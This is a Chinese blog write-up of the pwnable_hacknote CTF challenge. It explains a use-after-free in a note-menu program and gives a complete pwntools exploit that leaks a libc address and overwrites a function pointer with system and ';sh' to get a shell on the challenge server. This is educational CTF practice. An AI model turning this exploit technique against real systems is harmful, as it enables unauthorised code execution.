pwnable_hacknote

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量156 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129165408
版权

pwnable_hacknote

惯例先checksec一下

开启了canary和NX保护的32位程序

请添加图片描述

放进ida里看看

还是老样子很常规的菜单题的格式

请添加图片描述

1 添加堆

最多添加5个

先申请一个大小为8的chunk,该chunk的地址存放在ptr的下标为i的位置 接着将print_content的函数地址赋值给该chunk

然后在终端输入一个size值 在*(&ptr+i)的后4位上存储新申请的大小为size的chunk的值

请添加图片描述

2 删除堆

输入想要删除的idx的编号

然后将该chunk和负责print的chunk都free掉 但值得留意的是此处并没有将指针归0 因此存在uaf漏洞

请添加图片描述

3 打印堆

因为是利用chunk上存储的puts函数来打印 因此我们可以利用uaf漏洞来将函数篡改为system

请添加图片描述

首先由于是一个uaf漏洞 因此其实很明了了

我们先创建两个长度为0x80的chunk(由于是0x80因此在free掉后会被放到unsorted_bin里)然后我们将这两个chunk free掉(注意 此处先free chunk1再free chunk0虽然实际上没有太大的问题但是为了我们理解方便我们还是让chunk0在fastbin的末尾) 由于delete函数为将指针归零 因此出现了UAF漏洞我们此时再申请一个长度为8的chunk由于fastbin的LIFO原则因此原本chunk1所指的note段成为了新chunk的context段 由于print函数的原理是利用note段上存储的puts函数来打印 因此我们可以将puts函数的参数修改为我们想要他打印的函数地址 比如此处我们选择free函数的地址 然后我们利用free函数的地址来利用LibcSearcher工具寻找libc库

利用已知的libc库我们可以得到system函数的地址 然后利用和上文相同的方法我们将system函数放进note段print函数原本所在的位置 然后再在下一个地址上填入‘sh’,但是由于如果将puts函数地址覆盖为system地址,system的参数是system函数地址本身,这样肯定不行。但是使用连续执行多条命令的’ ; ‘,第一条执行错误会被忽略,然后执行下一条,因此可以成功将content位置覆盖成 ‘;sh\0’或||sh,同样的然后show(chunk1)就能执行system(‘sh’)得到shell了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T61eqzgB-1677054515220)(1677053366333.png)]

exp:

from pwn import *
from LibcSearcher import *
#io=process('./stkof')
io=remote('node4.buuoj.cn',25998)
elf=ELF('./hacknote')
free_plt=0x804A018
puts_chunk=0x804862b
def add(size,content):
    io.recvuntil('choice :')
    io.sendline('1')
    io.recvuntil('size :')
    io.sendline(str(size))
    io.recvuntil('Content :')
    io.sendline(content)

def delete(idx):
    io.recvuntil('choice :')
    io.sendline('2')
    io.recvuntil('Index :')
    io.sendline(str(idx))

def show(idx):
    io.recvuntil('choice :')
    io.sendline('3')
    io.recvuntil('Index :')
    io.sendline(str(idx))

add(0x80,'aaaa')
add(0x80,'bbbb')
delete(1)
delete(0)
payload=p32(puts_chunk)+p32(free_plt)

add(8,payload)
show(1)
free_addr=u32(io.recv(4))
libc=LibcSearcher('free',free_addr)
base=free_addr-libc.dump('free')
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
delete(2)
payload=p32(system)+';sh\x00'
add(8,payload)
show(1)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable_hacknote_WP
weixin_56434818的博客
03-01 742
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
【PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 400
回顾经典老题。一、
pwnable_kr:壳牌我们玩游戏吗?
05-14
Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞 转炉 旗帜 密码 随机的 输入 腿 错误 炮击 硬币1 二十一点 乐透 命令1 命令2 af 码图 Memcpy 汇编 取消连结 ...
Pwnable
03-26
Pwnable
pwnable-echo2的附件
11-16
pwnable-echo2的附件
pwnable:项目开发的主要资料库
04-11
可拥有的项目开发的主要资料库尽管在美国劳动力中对熟练IT专业人员的需求稳步增长,但不到一半的美国高中开设了信息技术和计算课程。 供需之间的这种差异可以合理地视为低估了潜在的就业率以及整个IT领域的创新。...
PWM.rar_PWN
09-23
在编程中,"pwn" 通常指的是“Pwnable”类别,这是一个安全领域的术语,指的是利用软件漏洞进行攻击或控制的技巧。在这个上下文中,"pwn" 可能是指编写用于控制硬件(如使用PWM技术)的代码,可能是为了教育、测试或...
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 496
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
[BUUCTF]-PWN:pwnable_hacknote解析
2301_79326813的博客
01-29 308
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
pwnable.tw之hacknote
qq_35429581的博客
10-13 2905
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
buuoj刷题记录 - pwnable_hacknote
qq_34010404的博客
03-19 273
查看程序保护: 拖进IDA分析一下, Add函数正常,先创建八个字节的内存 struct Node{ { void* func_addr; void* content; } 然后根据输入的size开辟相应大小的内存 问题存在于DelNote函数中,free后没有置0 看一下PrintNote函数: 根据八个字节的前四个字节调用对应的函数,并把这个八个字节的首地址作为参数 若Note被free后,还是可以调用Print函数的,由于不确定func_addr是什么,所以会出现问题. 构造方法: 先Add两
pwnable.tw hacknote
weixin_30284355的博客
03-22 124
产生漏洞的原因是free后chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] char buf; // [esp+8h] [ebp-10h] unsigned int v3; // [esp+Ch] [ebp-Ch] v3 = __readgsdword(0x14u); ...
pwnable.tw_hacknote_uaf利用
Jc
07-19 442
一道大家都说入uaf比较好的例题,将自己学习的uaf的历程记录一下,来自某大佬一句励志的话 解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 运行 IDA审计 1.add 2.del 3.print ...
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 395
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
pwnable.kr-fix
r00tnb的博客
02-28 862
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include <stdio.h> // 23byte shellcode from http://shell-storm...
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 389
buuctf pwn 第三页
pwn hacknote
最新发布
05-21
HackNote 是一道非常经典的 pwn 题目,其难度较为适中,适合初学者进行练习。其主要思路是通过堆溢出来实现 getshell。...如果您对 HackNote 题目感兴趣,可以在一些在线平台上进行尝试,比如 Pwnable.kr 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值